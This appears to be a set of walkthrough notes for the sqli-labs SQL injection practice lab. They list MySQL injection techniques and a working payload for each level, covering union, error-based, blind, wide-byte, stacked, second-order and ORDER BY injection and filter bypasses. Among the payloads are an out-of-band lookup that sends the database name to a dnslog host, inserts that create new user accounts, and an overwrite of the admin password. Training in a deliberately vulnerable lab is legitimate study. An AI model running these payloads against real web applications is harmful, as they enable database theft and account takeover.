sqli-labs walkthrough notes

Takake
1.General queries
1.1.Functions
- concat(arg1,arg2,arg3); each arg can be a string, a subquery, or a column name
- group_concat(arg); joins every value of a column into one string (cut off at @@group_concat_max_len, 1024 bytes by default)
- concat_ws(sep,arg1,arg2,arg3); joins the arguments using sep as the separator
- substr(str,start,len); substring, start is the 1-based index of the first character, len the number of characters
- mid, a drop-in replacement for substr
select mid((select database()),1,1);
- ascii(arg), returns the ASCII code of a character as a number; the basis of binary-search (bisection) blind injection. ord can be used instead
- extractvalue(1,concat(0x7e,(arg),0x7e)); arg is the query; the XPATH error message shows at most 32 characters of the string, so longer results have to be sliced with substr
- updatexml(1,concat(0x7e,(arg),0x7e),1); same idea
- exp(arg); error-based injection through a DOUBLE overflow (exp(~(subquery))); works on older MySQL versions only
- sleep(n); time-based injection, n is the delay in seconds
- group by x; group by error-based injection (the floor(rand(0)*2) duplicate-key trick); version-dependent
- order by n; n is a number, used to find how many columns the query returns (the smallest n that errors is one more than the column count)
- regexp can replace the equals sign
- between a and b can be used for the ascii comparison, or, with a equal to b, as a replacement for the equals sign
- limit offset,count; offset is the 0-based index of the first row, count the number of rows
- Comma-filter bypass tricks
In stacked injection, use cross join instead of VALUES(a,b,c) to avoid the commas,
eg:
INSERT INTO users SELECT * FROM (SELECT 3)a CROSS JOIN (SELECT 'systest')b CROSS JOIN (SELECT '15661561521')c
In union injection, join single-column derived tables instead of writing select 1,2,3
Use offset to avoid the comma after limit: limit 1 offset 0 is the same as limit 0,1 (mind the reversed operand order: limit m,n equals limit n offset m)
Use substr(str from 1 for 1) to avoid the commas inside substr()
Full example: https://github.com/takakie/CVE/blob/main/home-rental/home-rental-sqlinject1.md
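The four comma-free forms above side by side, as an added example that is not part of the original notes. It assumes the sqli-labs security.users table (id, username, password); the values inserted are made up.

```sql
-- Added example: comma-free equivalents of the usual injection building blocks.
-- Assumes the sqli-labs schema (security.users with columns id, username, password).
USE security;

-- 1. UNION SELECT 1,database(),3 without commas: single-column derived tables
--    glued with JOIN (a JOIN without ON is a cross join in MySQL). Each derived
--    table contributes one column, so the union still has three columns.
SELECT * FROM users WHERE id = -1
UNION SELECT * FROM (SELECT 1)a JOIN (SELECT database())b JOIN (SELECT 3)c;

-- 2. INSERT without VALUES(a,b,c): the same trick feeds INSERT ... SELECT.
--    (99 / 'systest' / 'pw' are constructed sample values.)
INSERT INTO users SELECT * FROM (SELECT 99)a JOIN (SELECT 'systest')b JOIN (SELECT 'pw')c;

-- 3. LIMIT without a comma. Mind the operand order:
--    LIMIT offset,count  ==  LIMIT count OFFSET offset
SELECT username FROM users LIMIT 1,1;            -- second row
SELECT username FROM users LIMIT 1 OFFSET 1;     -- the same second row

-- 4. substr() without commas: the SQL-standard FROM ... FOR form.
--    SUBSTRING() accepts the same syntax.
SELECT substr(database(), 1, 1);                 -- 's'
SELECT substr(database() FROM 1 FOR 1);          -- 's'
SELECT substr(database() FROM 2 FOR 1);          -- 'e'
```

Because these are plain MySQL syntax rather than encoding tricks, they survive filters that only look for the comma character; a filter that also blocks join, offset or for needs a different approach.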
1.2.Special characters
- 0x7e is ~
- 0x81-0xFE (usually %df) for wide-byte injection: when the connection charset is GBK, a lead byte in that range and the 0x5C backslash that escaping puts in front of the quote form one two-byte character, so the backslash is swallowed and the quote behind it stays live
- /* */  --+  /*! */ (inline conditional comment, MySQL still executes its content)  # are comments; ; is not a comment but the statement separator used for stacked queries
1.3.Special tables, columns and libraries
- information_schema holds the metadata of every library and table
- schemata, which libraries exist
- tables, which tables each library has
- columns, which columns each table has
- library name schema_name (table_schema in tables and columns), table name table_name, column name column_name
1.4.Special query statements
Current library: select database()
Current database version: select version()
Current user: select user()
Which libraries exist
select group_concat(schema_name) from information_schema.schemata
Which tables a library has (note that it is table_schema here, not schema_name)
select group_concat(table_name) from information_schema.tables where table_schema = 'args'
Which columns a table has (add and table_schema = 'args' as well, since the same table name can exist in several libraries; group_concat is cut off at 1024 bytes, so for long lists fall back to limit 0,1 / limit 1,1 / ... one row at a time)
select group_concat(column_name) from information_schema.columns where table_name = 'args'
Error-based query statements
and updatexml(1,concat(0x7e,(select database()),0x7e),1);
and extractvalue(1,concat(0x7e,(select database()),0x7e));
# find the table (and its library) that has a column named flag
and updatexml(1,(concat(0x7e,(select concat_ws('@',1,table_schema,table_name) from information_schema.columns where column_name='flag' limit 1,1),0x7e)),1)
exp(~(select * from (select user())as a))
Time-based blind injection
and if(substr((select database()),1,1)='r',sleep(1),1)
and if(ascii(substr((select database()),1,1))>100,sleep(1),1)
Query the data in a table
select 1,(select group_concat(concat(username,':',password)) from users),database()
select 1,(select concat_ws('~',id,username,password) from users limit 1,1),3
Check that flag is non-empty
select flag from metinfo.met_lang where COALESCE(flag, '') != '';
select flag from metinfo.met_lang where flag != '' and flag is not null;
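The error-based statements above stop at 32 characters, which is the first thing that bites when the value is a table or credential list. The following is an added example, not part of the original notes, showing how to page through a longer value and the group-by variant listed in 1.1; it assumes the sqli-labs security database (tables emails, referers, uagents, users).

```sql
-- Added example: error-based extraction beyond the 32-character limit.
-- Assumes the sqli-labs security database; run with USE security;

-- The message is  XPATH syntax error: '~<data>'  and only 32 characters of the
-- string are shown, the leading 0x7e included, so 31 characters survive per request.
SELECT * FROM users WHERE id = 1
  AND extractvalue(1, concat(0x7e, (SELECT group_concat(table_name)
                                     FROM information_schema.tables
                                    WHERE table_schema = database())));
-- -> XPATH syntax error: '~emails,referers,uagents,users'   (30 characters, fits)

-- Anything longer is read in 31-character windows with substr:
-- window 1 = substr(x,1,31), window 2 = substr(x,32,31), window 3 = substr(x,63,31) ...
SELECT * FROM users WHERE id = 1
  AND updatexml(1, concat(0x7e, substr((SELECT group_concat(username, ':', password)
                                          FROM users), 1, 31)), 1);
SELECT * FROM users WHERE id = 1
  AND updatexml(1, concat(0x7e, substr((SELECT group_concat(username, ':', password)
                                          FROM users), 32, 31)), 1);
-- Stop when a window comes back shorter than 31 characters (or empty).

-- The group-by variant from 1.1: the grouping key is the value plus floor(rand(0)*2).
-- With three or more rows in the FROM table the aggregation meets the same key
-- twice, and MySQL puts the key, i.e. the data, into the duplicate-entry error.
SELECT count(*), concat(0x7e, (SELECT database()), 0x7e, floor(rand(0)*2)) AS x
  FROM information_schema.tables GROUP BY x;
-- -> ERROR 1062 (23000): Duplicate entry '~security~1' for key ...
```

The windowed form costs one request per 31 characters, so it is worth first asking for length((select ...)) to know how many windows are needed.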
2.Lesson notes
1.Less 1
- plain single-quote string injection, payload: '
- ?id=-1' union select 1, 2, 3 --+
2.Less 2
- ?id=-1 union select 1, 2, 3 --+
3.Less 3
- ?id=-1') union select 1,2,3 --+
4.Less 4
- ?id=-1") union select 1,2,3 --+
5.Less 5
- ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+
6.Less 6
- ?id=1" and updatexml(1,concat(0x7e,database(),0x7e),1) --+
7.Less 7
- ?id=1'))+and+load_file(concat('//',(database()),'.btcee6.dnslog.cn/123'))--+
- out-of-band: load_file on a UNC path makes the MySQL server resolve the host name, so the library name shows up in the DNS log; this needs a MySQL server on Windows (UNC paths) and the FILE privilege, and secure_file_priv may block it
8.Less 8
- ?id=1'+and+1=if(substr(database(),1,1)='s',1,2)--+
9.Less 9
- ?id=1'+and+if(1=1,sleep(2),2)--+
10.Less 10
- ?id=1%22+and+if(substr(user(),1,1)='r',sleep(1),1)--+
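Less 8 to 10 (and the time-based lines in 1.4) test one character against one guess per request; the practical version is a bisection over ascii(). The following is an added example, not part of these notes: a MySQL stored procedure that simulates locally the loop a blind-injection client runs. The oracle expression ascii(substr(target,pos,1)) > mid is exactly the condition that would be injected as and (...) for the boolean levels or if((...),sleep(1),1) for the time-based ones; here each evaluation stands in for one HTTP request. The procedure and variable names are mine.

```sql
-- Added example: local simulation of the client-side bisection used in blind
-- injection. Each evaluation of "oracle" corresponds to one request whose
-- true/false result is read from the page contents or from a sleep() delay.
DELIMITER $$
DROP PROCEDURE IF EXISTS blind_extract $$
CREATE PROCEDURE blind_extract(IN target TEXT, OUT result TEXT)
BEGIN
  DECLARE pos INT DEFAULT 1;
  DECLARE lo INT;
  DECLARE hi INT;
  DECLARE mid INT;
  DECLARE oracle INT;
  SET result = '';
  extract_loop: LOOP
    -- search space for one byte: 0..127 covers ASCII names; use 0..255 with ord()
    -- when the data may contain non-ASCII bytes
    SET lo = 0;
    SET hi = 127;
    WHILE lo < hi DO
      SET mid = (lo + hi) DIV 2;
      -- the injected condition; "true" shifts the lower bound, "false" the upper
      SET oracle = (ASCII(SUBSTR(target, pos, 1)) > mid);
      IF oracle THEN
        SET lo = mid + 1;
      ELSE
        SET hi = mid;
      END IF;
    END WHILE;
    -- substr past the end returns '' and ascii('') is 0: end of the string
    IF lo = 0 THEN
      LEAVE extract_loop;
    END IF;
    SET result = CONCAT(result, CHAR(lo));
    SET pos = pos + 1;
  END LOOP;
END $$
DELIMITER ;

-- constructed input: 8 characters, 7 oracle calls each plus one for the terminator
CALL blind_extract('security', @out);
SELECT @out;                      -- 'security'
-- the real target of Less 8/9/10
CALL blind_extract(DATABASE(), @dbname);
SELECT @dbname = DATABASE();      -- 1
```

Seven comparisons per character is the cost of a 0..127 search; the 1.1 note about between a and b applies here too when > is filtered, since ascii(x) between mid+1 and 127 is the same test.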
11.Less 11
- uname=admin'+union+select+(select+flag+from+metinfo.met_lang+where+flag+is+not+null+and+flag+!=+''limit+0,1),(database())--+&passwd=1234562
12.Less 12
- uname=-admin")+union+select+1,database()--+&passwd=admin&submit=Submit
13.Less 13
- uname=admin')+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+
14.Less 14
- uname=admin"+and+extractvalue(1,concat(0x7e,user(),0x7e))--+
15.Less 15
- uname=admin'+and+1=if(substr(database(),1,1)='s',1,2)--+
16.Less 16
- uname=admin")+and+1=if(substr(database(),1,1)='s',1,2)--+
17.Less 17
- passwd=123456'+where+updatexml(1,concat(0x7e,database(),0x7e),1);--+
18.Less 18(insert)
- ' OR updatexml(1,concat(0x7e,database()),0x7e) OR '
# the SQL the back end executes
19.Less 19(insert)
Referer: 'or updatexml(1,concat(0x7e,database(),0x7e),1) or'
Note: if you get FUNCTION security.updataxml does not exist, check whether you misspelled the function name
20.Less 20
- Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) -- sd
21.Less 21(Cookie)
- Cookie: uname=J29yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSksMSkgb3In
- (base64 of 'or updatexml(1,concat(0x7e,database(),0x7e),1) or')
22.Less 22
- Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpLS0gcw==
- Cookie: uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)-- s
23.Less 23(comments removed)
- ?id=-2'+union+select+1,database(),'
- with -- and # filtered, the trailing quote of the payload pairs with the query's own closing quote instead of commenting it out
24.Less 24(second-order injection)
- Register a new user with username=admin'+--+1
- Then log in as username=admin'+--+1,
- Finally enter any password in the change-password form; admin's password is changed.
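To see why the three steps of Less 24 work, here is the statement sequence the back end runs, as an added example that is not part of the original notes. It assumes the lab's statement shapes (an escaped INSERT at registration and UPDATE users SET password=... WHERE username='$username' AND password='$curr_pass' at password change, with $username taken unescaped from the session) and the security.users schema; the password values are made up.

```sql
-- Added example: the second-order injection of Less 24, step by step.
-- Assumes the sqli-labs security.users table and the statement shapes noted above.
USE security;

-- 1. registration: the input  admin'-- 1  is escaped, so the INSERT is valid and
--    what lands in the table is the literal name  admin'-- 1
INSERT INTO users (username, password) VALUES ('admin\'-- 1', 'anything');
SELECT username FROM users WHERE username = 'admin\'-- 1';   -- admin'-- 1

-- 2. login as that user works the same way (escaped), and the session now holds
--    the raw name. The password-change page builds its UPDATE from the session
--    value without escaping, so the statement that actually runs is:
UPDATE users SET password = 'hacked'
 WHERE username = 'admin'-- 1' AND password = 'anything';
-- Everything after "-- " is a comment: the WHERE clause has collapsed to
-- username = 'admin', and the current-password check is gone with it.

-- 3. result: the real admin account has the attacker's password
SELECT username, password FROM users WHERE username = 'admin';   -- hacked
```

The defect is not the missing escaping at step 1 but the trust placed in a value that was already stored: anything read back from the database or the session must be parameterised again before it is put into a new query.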
25.Less 25 (and/or filtered)
- ?id=-2'+union+select+1,database(),3--+
- || can replace or (and && can replace and)
- anandd: double-write the keyword, the filter removes one copy and leaves the other
26.Less 25a
- ?id=-2+union+select+1,database(),3--+
27.Less 26
%a0 (non-breaking space) passes the whitespace filter
?id=0'union%a0select%a01,database(),'3
28.Less 26a
- ?id=0')%a0union%a0select%a01,2,('3
29.Less 27
- ?id=3'%a0and%a0extractvalue(1,concat(0x7e,database(),0x7e))%a0and%a0''='
30.Less 27a
- ?id=1"%a0and%a0substr(database(),5,1)='r'%a0and%a0""="
31.Less 28
- ?id=0')%a0UnIOn%a0seLeCt%a01,database(),('3
32.Less 28a
- ?id=3')%a0and%a0substr(database(),1,1)='s'%a0and%a0''=('
33.Less 29
- ?id=-1' union select 1,database(),3 --+
- I did not quite understand this one
34.Less 30
- ?id=-2" union select 1,database(),3 --+
35.Less 31
- ?id=-1")union+select+1,database(),3--+
36.Less 32
- ?id=0%df'+union+select+1,database(),3--+
- wide-byte injection: %df swallows the escaping backslash that is added in front of the quote
37.Less 33
- ?id=-2%df'+union+select+1,database(),3--+
38.Less 34
- uname=admin%df'+and+extractvalue(1,concat(0x7e,database(),0x7e))--+x
39.Less 35
- ?id=-2+union+select+1,database(),3--+
40.Less 36
- ?id=-2%df'+union+select+1,database(),3--+-
41.Less 37
- uname=admin%df'+and+extractvalue(1,concat(0x7e,database(),0x7e))--+-
42.Less 38
- ?id=-2'+union+select+1,database(),3--+
- stacked queries from here on: the back end runs the statement with mysqli_multi_query, so a second statement after ; is executed; its result is not shown on the page, verify it with a follow-up request
43.Less 39
?id=-2'+union+select+1,database(),3--+
?id=2';insert+into+users+(id,username,password)+values+(16,'admin12343','password')--+
44.Less 40
- ?id=1;insert+into+users(username,password)+values('admin123','123456')--+
45.Less 41
- ?id=-2;insert+into+users(username,password)+values('admin41','123456')--+
46.Less 42
- login_password=admin';insert+into+users(username,password)+values('admin42','123')--+
47.Less 43
- login_password=admin');insert+into+users(username,password)+values('admin43','123456')--+
48.Less 44
- login_password=admin';insert into users(username,password) values('admin44','123456')--+
49.Less 45
- login_password=admin');insert+into+users(username,password)+values('admin45','123456')--+
50.Less 46(Order by)(numeric)
Compare the row order under rand(0) and rand(1): if switching the seed changes the order, the sort key is being evaluated as SQL
?sort=rand(extractvalue(1,concat(0x7e,database(),0x7e)))
SELECT * FROM users ORDER BY $id
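The rand(0)/rand(1) check and the error-based payload of Less 46 together, as an added example that is not part of the original notes, against the lab's SELECT * FROM users ORDER BY $id (security.users assumed). It also covers the boolean and time-based forms used in Less 48 and 49.

```sql
-- Added example: detecting and exploiting an ORDER BY injection point.
-- Assumes the sqli-labs security.users table; run with USE security;

-- rand(seed) with a constant seed yields the same sequence every time, so
-- ORDER BY rand(0) and ORDER BY rand(1) give two fixed, normally different,
-- row orders. If changing the seed changes the order, the parameter is live SQL.
SELECT id, username FROM users ORDER BY rand(0);
SELECT id, username FROM users ORDER BY rand(1);

-- boolean blind (Less 48 style): the condition becomes the seed, true -> rand(1),
-- false -> rand(0), so the page's row order answers one yes/no question per request
SELECT id, username FROM users ORDER BY rand(substr(database(),1,1) = 's');

-- error-based (Less 46): the sort key is evaluated, extractvalue raises the
-- XPATH error and the library name rides along in the message
SELECT id, username FROM users ORDER BY rand(extractvalue(1,concat(0x7e,database(),0x7e)));

-- time-based (Less 49 style): the sort key runs for each row, so the delay
-- grows with the table size; keep the sleep short
SELECT id, username FROM users ORDER BY if(substr(database(),1,1)='s', sleep(0.2), 1);

-- UNION does not fit inside ORDER BY, but the column count can still be found
-- the classic way: ORDER BY n errors as soon as n exceeds the selected columns
SELECT id, username, password FROM users ORDER BY 3;   -- ok
SELECT id, username, password FROM users ORDER BY 4;   -- ERROR 1054: Unknown column '4' in 'order clause'
```

The fix on the application side is to map the user-supplied sort parameter onto an allow-list of column names rather than interpolating it, since a bind parameter in ORDER BY is treated as a constant and does not sort.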
51.Less 47 (string)
- ?sort=1'+and+extractvalue(1,concat(0x7e,database(),0x7e))--+
- SELECT * FROM users ORDER BY '$id'
52.Less 48
- ?sort=rand(substr(database(),2,1)='e')
53.Less 49
- ?sort=1'+and+if(substr(database(),1,1)='a',sleep(0.2),2)--+
54.Less 50
- ?sort=1;insert+into+users(username,password)+values('admin50','123456');
55.Less 51
- ?sort=1';insert+into+users(username,password)+values('admin51','123456');--+
56.Less 52
- ?sort=1;insert+into+users(username,password)+values('admin52','123456');
57.Less 53
- ?sort=1';insert+into+users(username,password)+values('admin53','123456');
58.Less 54(the real challenges start)
- ?id=-1'+union+select+1,(select+secret_HN7O+from+CHALLENGES.8u96bgqr6k+limit 0,1),3--+
# get the column name
59.Less 55
- ?id=-1)+union+select+1,(select secret_MPMF from challenges.6c905h5gnb limit 0,1),3--+
60.Less 56
- ?id=-1")--+
61.Less 57
- ?id=-2"+union+select+1,(select secret_SP7C from challenges.16vjhzk4v6),3--+
62.Less 58
- ?id=1'+and+exp(~(select * from (select concat(table_name,'@',column_name) from information_schema.columns where table_schema='CHALLENGES' and substr(column_name,1,6)='secret')as a));--+
63.Less 59
- ?id=1+and+exp(~(select * from (select secret_A464 from challenges.ee4euc0k32)as a));--+
64.Less 60
- ?id=2")+and+exp(~(select * from (select concat(table_name,'@',column_name) from information_schema.columns where table_schema='CHALLENGES' and substr(column_name,1,6)='secret')as a));--+
65.Less 61
- ?id=2'))+and+exp(~(select * from (select secret_5NFH from challenges.3pw6shmv87)as a));--+
66.Less 62
- kUJ5DvUgf8TvbETeyoCDFxsS